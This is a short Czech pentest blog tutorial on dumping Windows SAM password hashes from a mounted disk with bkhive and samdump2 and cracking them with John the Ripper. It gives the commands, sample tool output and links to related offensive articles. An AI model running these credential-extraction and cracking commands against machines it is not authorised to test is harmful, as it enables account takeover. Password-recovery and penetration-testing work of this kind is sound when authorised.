Ve fóru jsem slíbil rozepsat téma – prolomení hesla v příkazové řádce. Nejedná se o nic překotného. V dalším textu bude popsán crack Windows XP a Windows Vista HASHe a crack složitějších hesel pomocí jednoduchého clusteru. Tato krátka stať je pouze z důvodu kontinua. V širších souvislostech je téma aktuálnější než se zdá, zejména v době kdy se začíná seriózně hledat fungující řešení pro pentesting WPA zabezpečení. Padla první seriózní zmínka o nasazení implementace Pico Computingu v pentest Linux distribuci BackTrack. Refresh..
Notorický známé příkazy, postup pro získání a crack SAM a syskey z operačního systému Microsoft Windows pomocí slovníkového útoku nebo bruteforce útoku.. Aplikace bkhlive a samdump2 existují již dlouho.
bkhlive
bkhive /mnt/sda3/WINDOWS/system32/config/system uloz-syskey.txt
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it
Root Key : $$$PROTO.HIV
Default ControlSet: 001
Bootkey: 88ca2e3c7352451edf7ffa9d73514348
nebo
cd /mnt/sda3/WINDOWS/system32/config/
cp SAM /tmp
cp system /tmp
bkhive system key > /tmp/key
samdump2 sam /tmp/key > /tmp/hash.txt
samdump2
samdump2 /mnt/sda3/WINDOWS/system32/config/SAM uloz-syskey.txt>hashe-hesel.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it
Root Key : SAM
Brute force útok na heslo
./john /root/hashe-hesel.txt -i:all

Slovníkový útok na heslo
./john -w slovník /root/hashe-hesel.txt -i:all
BootDisk Offline Recovery
Je Linux floppy nebo disk image distribuce pro změnu hesla administrátora nebo editaci registrů v operčním systému Microsoft Windows. ISO můžete stahovat z webu eunet. Live CD je podrobně popsáno zde.

Cluster Knoppix
Webová stránka a popsáno v dalším textu – odkazna článek bude doplněn.
Kam dál?
- + Metasploit Social Engineering
+ Security novinky podzim 2008
+ Sqlninja – SQL Injection MS-SQL
+ Metasploit – meterpreter keystroke sniffing
+ BackTrack 4 Final Release (zatím pouze anglicky) ke stažení
+ Prolomení WPA zabezpečení pomocí HASHe
+ Privoxy a Tor – BackTrack 3 anonymita na internetu
+ NULL pointer dereference exploit
+ Šifrujeme ICQ – IM Pidgin a OTR
+ Phishing MPack – XSS a další techniky
+ Kód afrag, MDK a Ska – Fragmentační útok
+ Nokia N900 packet injection wl1251 Maemo Fremantle [NeoPwn]
+ Mini pentest distribuce SliTaz Linux – aircrack-ng live CD
+ Google-fu! Google hacking – šmírujeme kamery na internetu
+ Exploitácia operačného systému Windows Server 2003
+ Damn Vulnerable Linux Strychnine+605
+ Asus EEE 701 instalace BackTrack Linux




